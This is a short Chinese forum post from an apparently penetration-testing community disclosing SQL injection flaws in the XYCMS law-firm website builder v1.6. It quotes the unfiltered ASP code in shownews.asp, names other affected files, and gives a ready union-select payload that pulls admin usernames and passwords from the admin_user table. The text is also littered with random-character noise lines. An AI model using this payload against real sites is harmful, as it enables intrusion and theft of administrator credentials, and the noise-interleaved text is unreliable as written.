中国网络渗透测试联盟

标题: XYCMS律师事务所建站系统注入漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:28
标题: XYCMS律师事务所建站系统注入漏洞
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
$ ]3 t8 ^4 \  b5 M3 n: `0 D
: u' R. B: h  q) ^7 O& \! O7 A+ I) T淫荡分割线
7 N7 }( V& C  ?- r$ g1 t--------------------------------------------------------
1 c+ c: g. F8 Z) x7 e+ C0 `& S + ?: b  N& V5 C
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
" |7 @2 j% j5 W1 z( M7 I" o源码地址:http://down.chinaz.com/soft/29233.htm- ~  X$ ~4 j8 h. _7 n  X# R
+ K3 P6 g; j  @, g! d  S8 T' W
漏洞文件:shownews.asp
/ e& Q  b  e4 W' ~( M漏洞代码:7-13行1 Q7 ?; h0 h- s( I
7 {$ P+ L& @+ M  n3 B
# v4 W. j' K9 f6 ^9 e7 G% ?
<%
& e: t* h& z/ L; I) h( k# l, d" X& {* ~id=request.QueryString("id")
7 O+ o6 e) G$ D8 W& Y* N9 ^   
  Y$ c% |. e6 Y% ^set snews=server.createobject("adodb.recordset") 1 u3 ]  C4 c' {1 {! i0 |# ]& D* X
exec="select * from [news] where id="&id
; b- {+ a2 c% w, R3 qsnews.open exec,conn,1,1
  S% _" e8 R+ |! u6 o%>
5 p( E  Q! J, M( K( n6 } ) G: z7 A" x4 G) T6 e
% J1 O$ `/ [. x* _6 h
什么过滤都没有  直造成注入0 {! t( s9 U, G4 I

( a  I% B1 W) w& b- m) M! l注入点:http://127.0.0.1:99/shownews.asp?id=xx
4 A4 I. b& R" z% n) X; p
$ m& v( l7 ^9 t! d0 K其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
2 w* B, M1 ~8 Q7 y1 M4 v" L2 L* I - b$ n2 f1 ^- I. ~+ n

- ^5 H& @0 U. }2 }$ x& E3 o1 ]/ bexp: union select 1,admin,password,4,5,7 from admin_user
) Z& L, `8 n$ S! e: f* [& y' m5 r+ ?2 k" N7 x* g




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2